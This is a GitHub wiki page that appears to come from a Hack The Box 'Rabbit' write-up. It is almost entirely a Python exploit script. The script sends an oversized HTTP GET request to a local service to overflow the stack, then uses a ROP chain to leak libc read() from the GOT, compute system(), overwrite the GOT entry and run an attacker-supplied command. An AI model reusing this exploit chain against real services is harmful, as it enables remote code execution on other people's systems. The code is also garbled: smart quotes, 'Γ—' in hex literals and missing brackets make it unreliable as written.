simplesmash - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

addr = (β€˜127.0.0.1’, 9999)
cmd = sys.argv1+"\0"

libcread_offset = 0xe8050
libcsystem_offset = 0Γ—42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = r’GET /\AAAA’

#filler – fill buffer to 568 less initial payload of \AAAA (5)
payload += β€˜A’ * (568 -5)

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 0) #stdin #fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr
someother += β€œ0xFF” # junk for r15

#leak address of read() in randomised libc
someother += struct.pack(β€œ<Q”, 0Γ—400c50) #write() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 1) #stdout # fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += β€œ0xFF” #junk for r15

#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 0) #stdin # fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += β€œ0xFF” # junk for r15

#call read@plt with address of system() in libc
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += β€˜FFFFFFFF’ # bogus
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr system()

payload = payload + someother

s.connect(addr)

s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’+’\n’+’\n’)

s.send(cmd)

#calculate system() addr and send back
readaddr = struct.unpack(β€œ<Q”, s.recv(1024))0 #keep this line
print β€œlibc read() found at 0x%.8x” % readaddr #keep this line
systemaddr = readaddr – libcread_offset + libcsystem_offset
print β€œlibc system() found at 0x%.8x” % systemaddr
s.send(struct.pack(β€œ<Q”, systemaddr))

print s.recv(1024)

s.close

⚠️ **GitHub.com Fallback** ⚠️